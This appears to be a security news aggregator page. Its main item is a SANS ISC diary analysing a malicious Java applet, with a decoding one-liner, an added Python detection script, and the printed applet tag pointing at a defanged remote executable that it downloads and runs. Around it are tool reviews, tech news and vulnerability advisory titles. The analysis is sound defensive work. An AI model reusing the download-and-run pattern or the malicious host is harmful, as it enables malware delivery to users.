InfoSec News

One place I try to keep up with is Russ McRee's ISSA Toolsmith reviews of security tools. The December edition of the Toolsmith contains Russ's review of SamuraiWTF. SamuraiWTF is a web-application pentesting framework on a LiveCD assembled by Justin Searle from InGuardians and fellow ISC Handler Kevin Johnson of Secure Ideas.
Although SamuraiWTF is really too big to review in one magazine article, Russ does hit the high points in his review and concludes that SamuraiWTF rocks, plain and simple. It seems clear that if you spend any time doing webapp pentesting, this is a tool you should take a closer look at.

-- Rick Wanner - rwanner at isc dot sans dot org - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected) (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

 
Excel add-in ASAP Utilities piles so many features onto Excel, it can make you dizzy. You can convert text to uppercase, lowercase, or proper case (first word capitalized), merge and import multiple files, and copy a selection to the clipboard as HTML. Jobs that you could already do get grouped logically into one place. For instance, the Vision Control dialog box lets you hide and unhide gridlines, page breaks, tabs, and scroll bars. You can easily reverse the order of selected cells, fill a range with random numbers, and change hyperlinks to hyperlink() formulas.
 
AjaxTerm 'ajaxterm.js' Session Hijacking Vulnerability
 
Following our earlier post on nasty network address ranges, ISC reader Tom wrote in with some interesting logs. His information ties a recent wave of Java exploits to several addresses in the same 91.204.48.0/22 netblock. The latest exploits in this case start with a file called new.htm, which contains obfuscated code as follows:

This is easy to unravel: the numbers are Unicode escapes of ordinary ASCII characters, and they can be turned back into plain text with a Perl one-liner like this:
cat new.htm | perl -pe 's/u00(..)/chr(hex($1))/ge'
The resulting file looks as follows:
applet name=Java Update code=Polat. class archive=Hidden. jar height=10 width=1

param name=url value=hxxp://benaguasil. net/host.exe
Yes, the above is slightly modified. I tried to keep it plain enough that this diary can still be found via web search, but obfuscated enough to keep the less sophisticated anti-virus tools (like 90% of them) from triggering on this diary just because of the file name.
Nicely enough, we don't even have to use jad to decompile the Java class file: the url parameter passed to the applet is kinda telling all by itself. The good news is that host.exe already has pretty decent anti-virus coverage on VirusTotal.
But .. let's look at the Polat.class file anyway.



Nothing much going on here. A lot of smoke and mirrors, but basically this Java applet simply downloads the URL passed as a parameter (red underlines in the screenshot), writes it to a temp file called javafire.exe, and then tries to run that file (red box). If this doesn't work, the applet creates a file named firem.bat containing a command to start javafire.exe, and then tries to launch the batch file instead.
Huh? Download and run? Shouldn't the Java Sandbox prevent this?
Sure. This openConnection-and-run method of drive-by download only works when it is paired with a Java exploit. That is not the case here: the Java file is clean and doesn't contain an exploit for any recent vulnerability. So what gives? Well, let's try it out and see what happens...




A-ha! If you don't have any zero-days, you can always go back to exploiting the human! This is independent of the JRE version used: with JRE default settings, even on JRE 1.6-23, all the user has to do is click Run to get owned. The one small improvement is that the latest JREs show Publisher: (NOT VERIFIED) Java Sun in the pop-up, but I guess that users who read past the two exclamation marks will be bound to click Run anyway ...
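As an added example (not code from the diary or from its author), the following Python script does what the Perl one-liner and the manual reading of the applet tag above do by hand, in a form that can be run over captured pages: it decodes \u00XX escapes and then flags any applet whose parameters point at an executable, the download-and-run pattern the Polat.class analysis describes. The sample page, the hostname example.invalid and the function names are constructed for this example; the real new.htm is not reproduced here.

```python
import re
from html.parser import HTMLParser

# --- Constructed sample input (not the real new.htm) -----------------------
# The same style of applet tag as in the diary, with every character written
# as a \u00XX escape, which is the obfuscation the diary unravels with Perl.
def to_unicode_escapes(text: str) -> str:
    """Encode plain ASCII text as \\u00XX escapes (used only to build the sample)."""
    return "".join(f"\\u00{ord(c):02x}" for c in text)

SAMPLE_HTML = to_unicode_escapes(
    '<applet name="Java Update" code="Polat.class" archive="Hidden.jar" '
    'height="10" width="1">'
    '<param name="url" value="hxxp://example.invalid/host.exe">'
    "</applet>"
)

# --- Step 1: undo the escaping -----------------------------------------------
def decode_unicode_escapes(text: str) -> str:
    """Python equivalent of: perl -pe 's/u00(..)/chr(hex($1))/ge'.

    Also consumes the leading backslash of a \\u00XX escape, which the Perl
    pattern as written leaves in place. Non-escaped text passes through."""
    return re.sub(
        r"\\?u00([0-9a-fA-F]{2})",
        lambda m: chr(int(m.group(1), 16)),
        text,
    )

# --- Step 2: collect <applet> tags and their <param> children ----------------
class AppletScanner(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.applets = []      # list of {"attrs": {...}, "params": {...}}
        self._current = None   # applet currently being filled in

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "applet":
            self._current = {"attrs": attrs, "params": {}}
            self.applets.append(self._current)
        elif tag == "param" and self._current is not None:
            name = (attrs.get("name") or "").lower()
            self._current["params"][name] = attrs.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "applet":
            self._current = None

# Extensions that mark a parameter as "fetch this and execute it" rather than
# applet data; .exe and .bat are the two the diary's applet actually uses.
EXECUTABLE_EXTENSIONS = (".exe", ".bat", ".scr", ".dll")

# --- Step 3: flag applets whose parameters point at an executable ------------
def find_download_and_run_applets(raw_html: str) -> list:
    """Decode the page, then return one finding per applet parameter whose
    value ends in an executable extension. An empty list means nothing flagged."""
    scanner = AppletScanner()
    scanner.feed(decode_unicode_escapes(raw_html))
    findings = []
    for applet in scanner.applets:
        for param_name, value in applet["params"].items():
            if value.strip().lower().endswith(EXECUTABLE_EXTENSIONS):
                findings.append({
                    "code": applet["attrs"].get("code"),
                    "archive": applet["attrs"].get("archive"),
                    "param": param_name,
                    "value": value,
                })
    return findings

if __name__ == "__main__":
    print(decode_unicode_escapes(SAMPLE_HTML))
    for finding in find_download_and_run_applets(SAMPLE_HTML):
        print("FLAGGED:", finding)
```

The decoder is deliberately tolerant of both "\u0041" and bare "u0041" forms, since the Perl pattern only keys on the "u00" part; the HTML parser is used instead of a second regex so that attribute quoting and ordering inside the applet tag do not matter.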

 
Skype today blamed last week's outage on a combination of overloaded instant messaging servers, buggy software, and the failure of its "supernode" infrastructure.
 
Federal authorities have charged a California woman with securities fraud for allegedly passing detailed financial information on Nvidia and Marvell Technologies to portfolio managers at two hedge funds.
 
Everyone has a different way of managing their Web favorites--the sites they visit regularly. My method of choice is the Favorites Bar, which spans the top of the browser and puts my most-visited sites a single click away.
 
TYPSoft FTP Server 'RETR' Command Remote Denial Of Service Vulnerability
 
Rather than compete with Netflix for TV show and movie rentals, Apple should just buy its partner and rival, an industry said Wednesday.
 
[SECURITY] [DSA 2138-1] Security update for wordpress
 
Chilkat Software FTP2 ActiveX Component (ChilkatFtp2.DLL 2.6.1.1) Remote Code Execution poc
 
DzTube 'chid' Parameter SQL Injection Vulnerability
 

A look back at Cisco Security in 2010
NetworkWorld.com
Cisco took home the bronze in both IPS and FW readers choice awards in InfoSec Magazine 2010 results. In 2010, Cisco won the National Cybersecurity ...

 
Microsoft co-founder Paul Allen has revised his patent infringement lawsuit against 11 technology companies to include detailed claims against Google's Android OS, Apple's iTunes and App Store and Facebook's "Like" feature.
 
Pre Jobo .NET "Password" SQL Injection Vulnerability
 
Fedora 14 - Format string attack in allegro-tools package
 
Path disclosure in KaiBB
 
SQL injection in KaiBB
 
Digital Music Pad '.pls' File Remote Buffer Overflow Vulnerability
 
TYPO3 Core TYPO3-SA-2010-020 Multiple Security Vulnerabilities
 
PHP Address Book 'group_name' Parameter SQL Injection Vulnerability
 
The days of e-mailing the whole office to ask if anyone has a mobile-phone charger that fits your phone are numbered, as European standardization bodies on Wednesday released harmonized standards for a common charger.
 
Techphoebe QuickShare File Server Directory Traversal Vulnerability
 
YEKTAWEB CMS XSS Vulnerability
 
HotWeb Rentals "PageId" SQL Injection Vulnerability
 
[security bulletin] HPSBST02620 SSRT100356 rev.2 - HP StorageWorks Modular Smart Array P2000 G3, Remote Unauthorized Access
 
Known for being a power user's antimalware tool, Kaspersky has quietly evolved its Kaspersky Internet Security software ($80 for a one-year, three-PC license, as of 12/2/2010) into a somewhat kinder, gentler application more suitable for the masses.
 
There is a lot to be said for minimalism, but with Titanium Internet Security 2011 ($70 for one year, three PCs, as of 12/2/2010), Trend Micro takes it to the extreme. The suite's user interface is one of the most simplistic and stripped-down of the security apps we tested. A simple summary of threats stopped, a link to the utility's parental controls, and the date that your subscription expires are all the information the primary display offers. Below that, you can choose to scan your system, configure options, or check your logs. A large blue "Tools" button is actually a red herring, telling you only whether parental controls and "data theft prevention" (a rather useless utility that mysteriously claims to "prevent hackers from stealing credit card numbers, passwords" and so forth) are turned on.
 
Novices will want to run, not walk, away from G-Data Internet Security 2011 ($40 for one year, one PC; $60 for one year, three PCs, as of 12/2/2010). While it's more than capable at stopping viruses, its complexity, cluttered interface, and overly scary warnings make it less appropriate for more casual users.
 
OfficeSuite Pro ($15, with a 15-day free trial) is one of a growing number of apps that try to strengthen Android's weak office-document support. OfficeSuite has an integrated file browser that allows you to view Word, PowerPoint, Excel, and PDF files on your device, SD Card, and configured Google Documents accounts. You can also create and edit Word and Excel files, but oddly enough you can save them only on your device or SD Card, not on Google Docs. If I can't send my document edits back to Google Docs, and I can't add new documents, what's the point?
 
Techguy15 wants to know how to get through to a Web page where he's getting a 404 Page Not Found error.
 
Nokia Siemens Networks' $1.2 billion acquisition of Motorola's cellular networks business has been delayed pending a review from Chinese government regulators.
 
The tech pro faces many career challenges and even a humorous situation or two. Here's a collection of such IT stories from InfoWorld readers
 
Storage technology has evolved faster than microprocessors over the past five decades, and it's been a bigger building block of the Internet -- and of today's ever-expanding 'cloud' -- than most people realize.
 
Storage technology has developed faster than microprocessors, and it's been a bigger enabler of the Internet -- and today's 'cloud' -- than most realize. Consider how quickly drive capacities have increased and prices have plummeted over the past 50 years, from the RAMAC 305 with 5MB capacity to 0.85-in. microdrives with gigabytes of space for data.
 

Washington Hilton Hotel, Washington
Help Net Security
... atmosphere for demonstrating technology exploitation, inventive software and hardware solutions, and open discussions of critical infosec issues. ...

 
There's no telling what the future will bring, but one thing is sure: In the world of technology, nothing stays the same for very long. The year 2010 wasn't terribly turbulent for tech, but 2011 is shaping up to be more of a thrill than you might expect. From Android's scorched-earth march across the industry to malware threats that we have yet to wrap our arms around, it seems as if everything is about to change.
 

